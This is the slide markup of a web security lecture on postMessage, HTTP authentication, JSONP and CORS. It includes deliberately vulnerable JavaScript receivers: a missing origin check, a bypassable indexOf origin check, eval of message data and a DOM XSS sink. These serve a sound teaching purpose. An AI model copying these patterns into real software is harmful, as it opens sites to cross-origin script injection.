              <a:t>Receiver origin is specified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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postMessage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A (https://user.bank.io)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data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transfer_money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amount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1000.00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parent.postMessage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(data,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'https://payments.bank.io'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Origin B (https://payments.bank.io)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onMessage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msg.origin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'https://user.bank.io'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Do stuff...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addEventListener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'message'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onMessage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0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false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7159" y="3925078"/>
            <a:ext cx="1099146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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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parent.postMessage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user_info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'*'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Sender </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can specify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'*'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead of an actual origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any frame can receive the message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Considered bad practice if sending sensitive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postMessage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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No origin check :(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'#some-div'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).text(msg.data.info);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Broken origin check; matches *.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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bank.io,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but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also www.bank.io.attacker.com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msg.origin.indexOf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'.bank.io'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&gt;=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Code execution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eval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msg.data.code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DOM-based XSS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$(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'#some-div'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).html(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msg.data.tmpl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388620"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Receiver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>must verify the origin of messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Missing or broken checks are security vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are more common than you might </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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CSP refines the SOP, which is useful for preventing XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, developers have complained that SOP restrictions are too strict</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Would be desirable to have more flexible policies for cross-origin interaction – e.g., mashups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A number of mechanisms exist along these lines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side aggregation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CORS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Server-side aggregation is one solution to integrating resources from multiple origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the browser's perspective, all content is from the same origin, and so SOP is satisfied</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can also be performed on-demand (i.e., server proxies third-party content)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, this solution is problematic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server becomes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bottleneck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1" t="13369" r="13554" b="16091"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646548" y="2422760"/>
            <a:ext cx="765683" cy="95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Aggregation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2" y="3198622"/>
            <a:ext cx="747017" cy="7470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86678" y="3158405"/>
            <a:ext cx="1129989" cy="1101465"/>
            <a:chOff x="8547900" y="3207998"/>
            <a:chExt cx="1129989" cy="1101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47900" y="3909353"/>
              <a:ext cx="1129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yelp.com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65125" y="3158405"/>
            <a:ext cx="2020939" cy="1101465"/>
            <a:chOff x="8102428" y="3207998"/>
            <a:chExt cx="2020939" cy="11014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02428" y="3909353"/>
              <a:ext cx="2020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m</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>aps.google</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>.com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59675" y="3063118"/>
            <a:ext cx="3073437" cy="369332"/>
            <a:chOff x="6213632" y="3000914"/>
            <a:chExt cx="3073437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213632" y="3359305"/>
              <a:ext cx="307343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18744" y="3000914"/>
              <a:ext cx="166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/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>HTTP/1.1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6663" y="3679656"/>
            <a:ext cx="3116449" cy="450649"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="450649"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6863440" y="3698769"/>
              <a:ext cx="1773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HTTP/1.1 200 OK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170620" y="3617452"/>
              <a:ext cx="31164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80570" y="3063118"/>
            <a:ext cx="3073437" cy="369332"/>
            <a:chOff x="6213632" y="3000914"/>
            <a:chExt cx="3073437" cy="36933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213632" y="3359305"/>
              <a:ext cx="307343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918744" y="3000914"/>
              <a:ext cx="166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/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>HTTP/1.1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37558" y="3679656"/>
            <a:ext cx="3116449" cy="450649"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="450649"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6863440" y="3698769"/>
              <a:ext cx="1773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HTTP/1.1 200 OK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170620" y="3617452"/>
              <a:ext cx="31164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3" y="2517366"/>
            <a:ext cx="926341" cy="9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HTTP Authentication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6277" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2205" dirty="0"/>
              <a:t>Access control mechanism built into HTTP itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="306277" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2205" dirty="0"/>
              <a:t>Server indicates that authentication is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2205" dirty="0" smtClean="0"/>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205" dirty="0" smtClean="0"/>
              <a:t> in HTTP response</a:t>
            </a:r>
            <a:endParaRPr sz="2205" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="612554" lvl="1" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1654" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WWW-Authenticate: Basic realm="$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1654" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>realmID</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1654" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="306277" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2205" dirty="0"/>
              <a:t>Client submits base64-encoded username and password </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2205" i="1" dirty="0"/>
              <a:t>in the clear</a:t>
            </a:r>
            <a:endParaRPr sz="2205" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="612554" lvl="1" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1654" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Authorization: Basic BASE64($user:$</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1654" dirty="0" err="1">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1654" dirty="0"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612554" lvl="1" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205" dirty="0" smtClean="0"/>
              <a:t>HTTP is stateless, so this must be sent with every request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="612554" lvl="1" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2205" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2205" dirty="0"/>
              <a:t>real logout mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="306277" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2205" dirty="0"/>
              <a:t>Digest variant uses hash construction (usually MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2205" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2205" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="306277" indent="-306277" defTabSz="402536">
              <a:spcBef>
                <a:spcPts val="1617"/>
              </a:spcBef>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205" dirty="0" smtClean="0"/>
              <a:t>Is HTTP Authentication a good idea?</a:t>
            </a:r>
            <a:endParaRPr sz="2205" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24731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JSONP is another approach to bypassing SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loading data from another origin via an XHR is prohibited by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SOP…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…But</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, &lt;script&gt; is an exception (modulo CSP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JSONP leverages this exception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of directly performing a cross-domain load, JSONP injects a cross-domain &lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The returned script should contain a JS snippet that calls a function already defined in the enclosing page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function receives the requested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JSONP is a terrible, ugly hack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And its also potentially unsecure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212" y="5804353"/>
            <a:ext cx="7985449" cy="72889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callback(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‘You sent “Test”’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4212" y="1567536"/>
            <a:ext cx="8235821" cy="2174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enlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>// http://www.yelp.com</a:t>
            </a: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callback </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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(data) {</a:t>
            </a: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alert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‘Received message: ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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data);</a:t>
            </a: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jsonp_url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http://maps.google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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api.js?fn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err="1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callback&amp;echo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=Test'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4212" y="4372932"/>
            <a:ext cx="8235821" cy="634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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="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'&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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="'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jsonp_url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'"&gt;&lt;/script&gt;'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2034" y="3884785"/>
            <a:ext cx="1166793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034" y="5467882"/>
            <a:ext cx="1166793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730" y="5753300"/>
            <a:ext cx="357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dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> received from the third-party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1730" y="4274674"/>
            <a:ext cx="357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Request data from the third-party origin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30" y="2054238"/>
            <a:ext cx="3576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Set up a callback function for the JSONP requests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5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1" t="13369" r="13554" b="16091"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10752183" y="1823287"/>
            <a:ext cx="765683" cy="95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JSONP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00" y="4215167"/>
            <a:ext cx="747017" cy="7470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92313" y="2558932"/>
            <a:ext cx="1129989" cy="1101465"/>
            <a:chOff x="8547900" y="3207998"/>
            <a:chExt cx="1129989" cy="1101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47900" y="3909353"/>
              <a:ext cx="1129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yelp.com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96937" y="5428017"/>
            <a:ext cx="2020939" cy="1101465"/>
            <a:chOff x="8102428" y="3207998"/>
            <a:chExt cx="2020939" cy="11014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01" y="3207998"/>
              <a:ext cx="702183" cy="7021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02428" y="3909353"/>
              <a:ext cx="2020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m</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>aps.google</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
                <a:t>.com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863895">
            <a:off x="6975892" y="4702740"/>
            <a:ext cx="3073437" cy="376801"/>
            <a:chOff x="6213632" y="2982504"/>
            <a:chExt cx="3073437" cy="37680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213632" y="3359305"/>
              <a:ext cx="307343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77170" y="2982504"/>
              <a:ext cx="2146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/api.js </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>HTTP/1.1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rot="863895">
            <a:off x="6765563" y="5373288"/>
            <a:ext cx="3116449" cy="450649"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="450649"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6863440" y="3698769"/>
              <a:ext cx="1773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HTTP/1.1 200 OK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170620" y="3617452"/>
              <a:ext cx="31164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0390975">
            <a:off x="6809704" y="3296556"/>
            <a:ext cx="3073437" cy="369332"/>
            <a:chOff x="6213632" y="3000914"/>
            <a:chExt cx="3073437" cy="36933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213632" y="3359305"/>
              <a:ext cx="307343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918744" y="3000914"/>
              <a:ext cx="1663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/ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>HTTP/1.1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rot="20390975">
            <a:off x="6946378" y="3926852"/>
            <a:ext cx="3116449" cy="374152"/>
            <a:chOff x="6170620" y="3617452"/>
            <a:chExt cx="3116449" cy="374152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6871634" y="3622272"/>
              <a:ext cx="1773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HTTP/1.1 200 OK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170620" y="3617452"/>
              <a:ext cx="31164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525" y="4786978"/>
            <a:ext cx="926341" cy="926341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233376" y="1338986"/>
            <a:ext cx="7047495" cy="1742275"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38762"/>
              <a:gd name="adj2" fmla="val 11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document.write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lang="en-US" sz="2000" dirty="0" smtClean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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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='http</a:t>
            </a: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://maps.google.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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api.js?fn</a:t>
            </a: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callback&amp;echo</a:t>
            </a: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=Test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'&gt;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lang="en-US"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script</a:t>
            </a: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');</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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2456" y="4652509"/>
            <a:ext cx="4565128" cy="1856365"/>
            <a:chOff x="615721" y="4830315"/>
            <a:chExt cx="4565128" cy="1856365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="615721" y="4830315"/>
              <a:ext cx="4565128" cy="18563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2220" y="5030325"/>
              <a:ext cx="3853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The page at http://www.yelp.com says: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6278" y="5596381"/>
              <a:ext cx="3424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Received message: You sent “Test”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0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852726" y="4847267"/>
              <a:ext cx="304800" cy="304800"/>
            </a:xfrm>
            <a:prstGeom prst="mathMultiply">
              <a:avLst>
                <a:gd name="adj1" fmla="val 948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24953" y="6128862"/>
              <a:ext cx="1034462" cy="48553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JSONP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JSONP has the benefit that it works in legacy browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, its use has some security implications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote servers are highly trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can inject any script content into the requesting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Problems:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What if the JSONP server is compromised?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Huge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> potential for CSRF attacks if additional authentication is not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Cross-origin Resource Sharing (CORS)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Cross-origin resource sharing is a browser security mechanism for controlled relaxation of the SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to be used in situations where JSONP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>would be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>used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., XHR-based data loads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser allows scripts to access data returned from an XHR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the server indicates this is allowed via special HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CORS makes a distinction between simple and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple requests are sent immediately to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests are subject to a policy check before issuing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XHR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Request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866"/>
            <a:ext cx="10719318" cy="514778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$.get(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“http://api.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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data.json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”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function(data) { …} );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GET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/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data.json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HTTP/1.1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Host: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api.com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Origin: http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://example.com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HTTP/1.1 200 OK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Access-Control-Allow-Origin: http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://example.com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dirty="0" smtClean="0"/>
              <a:t>Here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, an XHR is issued for </a:t>
            </a:r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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>api.com/data.json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api.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>indicates to the requesting browser that this is allowed through the use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Access-Control-Allow-Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser releases the results to the page only if the origin matches (or is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'*'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8565" y="2248818"/>
            <a:ext cx="645600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8565" y="3614198"/>
            <a:ext cx="645600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262" y="160486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262" y="263434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6262" y="390019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sz="2400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5355772" y="2687192"/>
            <a:ext cx="4946780" cy="640702"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -76664"/>
              <a:gd name="adj2" fmla="val 32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origin is making this request?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484707" y="3766267"/>
            <a:ext cx="2817845" cy="1022578"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85936"/>
              <a:gd name="adj2" fmla="val 6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 replies that this host is allowed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2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Preflight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1111204" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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OPTIONS /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data.json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HTTP/1.1</a:t>
            </a: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Host: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api.com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Origin: http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://example.com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Content-Type: application/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json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Access-Control-Request-Method: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PUT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Access-Control-Request-Headers: X-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CustomHeader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HTTP/1.1 200 OK</a:t>
            </a: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Access-Control-Allow-Origin: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http://example.com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Access-Control-Allow-Methods: GET, POST,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PUT, DELETE, OPTIONS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Access-Control-Allow-Headers: X-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CustomHeader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74904">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="279400" algn="l"/>
                <a:tab pos="571500" algn="l"/>
                <a:tab pos="863600" algn="l"/>
                <a:tab pos="1155700" algn="l"/>
                <a:tab pos="1447800" algn="l"/>
                <a:tab pos="1739900" algn="l"/>
                <a:tab pos="2032000" algn="l"/>
                <a:tab pos="2324100" algn="l"/>
                <a:tab pos="2616200" algn="l"/>
                <a:tab pos="2908300" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="34925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Access-Control-Max-Age: 1000000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For certain requests, preflight must occur through an OPTIONS request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP methods </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>other than GET, POST, OPTIONS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MIME types other than form data or text/plain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917093" y="2463281"/>
            <a:ext cx="478971" cy="609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854750" y="3635827"/>
            <a:ext cx="478971" cy="10668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 header is an essential part of CORS and related cross-domain sharing proposals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But, it actually was originally proposed for a completely different purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-based CSRF mitigation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Idea was to restrict sources of side-effecting requests based on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer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problematic due to privacy leakage issues</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin avoids these problems to a degree</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must always be sent when the security context of a request is in question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only sends an origin, as opposed to the full URL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924592" cy="5344680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CORS is the most promising SOP replacement so far, but is not without detractors</a:t>
            </a:r>
          </a:p>
